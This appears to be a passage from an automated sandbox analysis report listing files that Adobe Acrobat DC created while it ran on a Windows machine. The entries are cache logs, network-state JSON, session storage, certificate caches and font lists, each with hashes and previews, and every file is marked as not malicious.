SSDEEP:	6:7yusyq2Pwkn2nKuAl9OmbnIFUt8Oyue1Zmw+OyuzdRkwOwkn2nKuAl9OmbjLJ:7ybyvYfHAahFUt8OyL/+Oy6R5JfHAaSJ
MD5:	F430F6ACB04FD6943A43FF6D3F318A1A
SHA1:	346F2C13A5E27A9DF8446E1257E0E3BE5C47C5F3
SHA-256:	EA54CF4A8E54340E93858EC94B3E65D3EA7DEFE9952FAB79662EB5A8911165DD
SHA-512:	C1AE6081A1CA26C32209E7C1A4679E24AF694BDDBB43C2E34705BBE22A5FABC4AE070BF2EBE372C34570BB505D6B12AB7E4A9426D25C2781F3207865A8C8111E
Malicious:	false
Preview:	2024/12/11-12:03:08.951 1f54 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-12:03:08.955 1f54 Recovering log #3.2024/12/11-12:03:08.956 1f54 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.229115913404077
Encrypted:	false
SSDEEP:	6:7yusyq2Pwkn2nKuAl9OmbnIFUt8Oyue1Zmw+OyuzdRkwOwkn2nKuAl9OmbjLJ:7ybyvYfHAahFUt8OyL/+Oy6R5JfHAaSJ
MD5:	F430F6ACB04FD6943A43FF6D3F318A1A
SHA1:	346F2C13A5E27A9DF8446E1257E0E3BE5C47C5F3
SHA-256:	EA54CF4A8E54340E93858EC94B3E65D3EA7DEFE9952FAB79662EB5A8911165DD
SHA-512:	C1AE6081A1CA26C32209E7C1A4679E24AF694BDDBB43C2E34705BBE22A5FABC4AE070BF2EBE372C34570BB505D6B12AB7E4A9426D25C2781F3207865A8C8111E
Malicious:	false
Preview:	2024/12/11-12:03:08.951 1f54 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-12:03:08.955 1f54 Recovering log #3.2024/12/11-12:03:08.956 1f54 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.1562378412863445
Encrypted:	false
SSDEEP:	6:7yTVM3+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OyTVaFkHZZmw+OyTVOVkwOwkn2nKuA:7yT6OvYfHAa8uFUt8OyTMiHZ/+OyTo56
MD5:	A638D50969CE75F9724098242E073BD1
SHA1:	BD84A291C08865A206907413861D643E442B53BB
SHA-256:	C8EF94EE049360410A3DE0CE97FD97466056CDCCFBF4A0488BD613041716F192
SHA-512:	E3CC764529A8A4F81FFA5DF0ED8B6343063CCDB284615B29DAB12A42808EB857B977B4E2537EE6C3B42FEEEDAF15F1EC2C0CBD0234576EB84528B7C4DD33FC4E
Malicious:	false
Preview:	2024/12/11-12:03:09.037 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/11-12:03:09.038 908 Recovering log #3.2024/12/11-12:03:09.039 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.1562378412863445
Encrypted:	false
SSDEEP:	6:7yTVM3+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OyTVaFkHZZmw+OyTVOVkwOwkn2nKuA:7yT6OvYfHAa8uFUt8OyTMiHZ/+OyTo56
MD5:	A638D50969CE75F9724098242E073BD1
SHA1:	BD84A291C08865A206907413861D643E442B53BB
SHA-256:	C8EF94EE049360410A3DE0CE97FD97466056CDCCFBF4A0488BD613041716F192
SHA-512:	E3CC764529A8A4F81FFA5DF0ED8B6343063CCDB284615B29DAB12A42808EB857B977B4E2537EE6C3B42FEEEDAF15F1EC2C0CBD0234576EB84528B7C4DD33FC4E
Malicious:	false
Preview:	2024/12/11-12:03:09.037 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/11-12:03:09.038 908 Recovering log #3.2024/12/11-12:03:09.039 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\84188b71-b236-4743-8600-b7b20c1ac281.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF658eb7.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f79c9bd1-7029-421e-9d31-8eec44a42976.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.959858996990373
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq8sBdOg2H9qcaq3QYiubInP7E4TX:Y2sRdsAdMH/3QYhbG7n7
MD5:	2121F901234B741D55772E95741BD847
SHA1:	052EA2B2D74EB16B0D737FE29FFA1478F723607F
SHA-256:	9158EB1F1E38009230922C274A20797EFD352EB824A618125F86ECB735F5BFA4
SHA-512:	91CF961337BDD4195C52DA345CF78538D8AA5CB934E02BE1398E748BEB9443DD5FC4D9A3CE59AD4F14647F0BCCC52BC8E1F4464A37DBB1D1C7228CE3991AB777
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378496601329431","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":636223},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.254633833664943
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Bd1G7:etJCV4FiN/jTN/2r8Mta02fEhgO73goQ
MD5:	B335D2F6F872C8AC1839A9001E9C06C1
SHA1:	9DD0C09467D7CF7B17A31E1B2A689F4C8C592023
SHA-256:	4AC89DA48CFE00F0BA686F3B0DC5DE889665D5AF6901529A17FBE7E0055E8B0D
SHA-512:	8853240C1D457A5D4DE410F0817C97CD01755EFF8439C466485FE71F28DAABB30BFDA2FCB3592DEC831849684788F63E373117650227210D92FB87F77BA9E3CB
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.190544300684776
Encrypted:	false
SSDEEP:	6:7yTtmn+q2Pwkn2nKuAl9OmbzNMxIFUt8OyTH1ZZmw+OyTvitVkwOwkn2nKuAl9Ob:7yTs+vYfHAa8jFUt8OyTVZ/+OyTvC5JH
MD5:	89AFD60656C5BD262841D098FD7075A2
SHA1:	ECC1F9DDD816904498888CBFA63C8B5AEAAD5FC2
SHA-256:	A0C3813D004117571B481293335CBC63BA137545AD13D00763BA52500F2C2301
SHA-512:	8B4F62FED9661344C20668C3261FBCD987743C2FB0A23039B4FC9F18A895A64FBA38D0B415B7AF88FD722DA8BB37565F301523A12AFEE189C65742FA6F1CE4DB
Malicious:	false
Preview:	2024/12/11-12:03:09.145 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/11-12:03:09.146 908 Recovering log #3.2024/12/11-12:03:09.147 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.190544300684776
Encrypted:	false
SSDEEP:	6:7yTtmn+q2Pwkn2nKuAl9OmbzNMxIFUt8OyTH1ZZmw+OyTvitVkwOwkn2nKuAl9Ob:7yTs+vYfHAa8jFUt8OyTVZ/+OyTvC5JH
MD5:	89AFD60656C5BD262841D098FD7075A2
SHA1:	ECC1F9DDD816904498888CBFA63C8B5AEAAD5FC2
SHA-256:	A0C3813D004117571B481293335CBC63BA137545AD13D00763BA52500F2C2301
SHA-512:	8B4F62FED9661344C20668C3261FBCD987743C2FB0A23039B4FC9F18A895A64FBA38D0B415B7AF88FD722DA8BB37565F301523A12AFEE189C65742FA6F1CE4DB
Malicious:	false
Preview:	2024/12/11-12:03:09.145 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/11-12:03:09.146 908 Recovering log #3.2024/12/11-12:03:09.147 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444727492094393
Encrypted:	false
SSDEEP:	384:yezci5tYiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r/s3OazzU89UTTgUL
MD5:	4508474D7140522EAEB50C956E3EC3F0
SHA1:	C0BBCBC8FB2F5D80AE341CDE939600153C9AF1A4
SHA-256:	844D2672499B43308376A3C03F9D913DF13151929A12342D1D571326963D0C36
SHA-512:	7167858F72C4D8913DB68A52C95E005A1550306D01964C0280E170AC420535152A1F333CB476373A59E456D310A69952D08A923FBFC5E10980A8710DC9F63802
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.76880675947528
Encrypted:	false
SSDEEP:	48:7MPp/E2ioyVIioy9oWoy1Cwoy1cKOioy1noy1AYoy1Wioy1hioybioyCoy1noy1j:74pjuIF3XKQDXb9IVXEBodRBkD
MD5:	FFABC109E39A4D4BB88130A5F4C8DC79
SHA1:	EFB7F1D35F1574125A393921728B28847F69F0E3
SHA-256:	E5EDDC38EBB3EF4B67184FF70BAE1F2FA5A4C34DF8CA46A729BE954C507E2539
SHA-512:	B76544418807496D4AC78E5AC7642A5AB3E0DCB8A80EB602897868E27AF0CB6CA5AC73A33F22DCC06BA607CAE56B9CA43870C9A9B8135D8E56AB4D6CA91156BF
Malicious:	false
Preview:	.... .c.......u................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.756901573172974
Encrypted:	false
SSDEEP:	3:kkFkln06/ltfllXlE/HT8kjChttNNX8RolJuRdxLlGB9lQRYwpDdt:kKL+eT8qC3NMa8RdWBwRd
MD5:	FC6B9DD3B95A250D60DE4DC4F9C9C80A
SHA1:	4966B43157147F31903B9162BEAEB23E0B6CC30F
SHA-256:	52DCCED529956B368A1E849D0306C0DB0B3C42B147AB2C24D0A2DE9C3DA72FDC
SHA-512:	E3DED25B72DF3DBA5479F7D8E042568C19B3053B4454DF98B3C25FEE91E4345664FB553EC084DD8345188A0BFF67603B8B9E4FDC1F4BF928C7CBFF1065DEC9A1
Malicious:	false
Preview:	p...... ..........f..K..(....................................................... ..........W....F...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7720

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7720

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
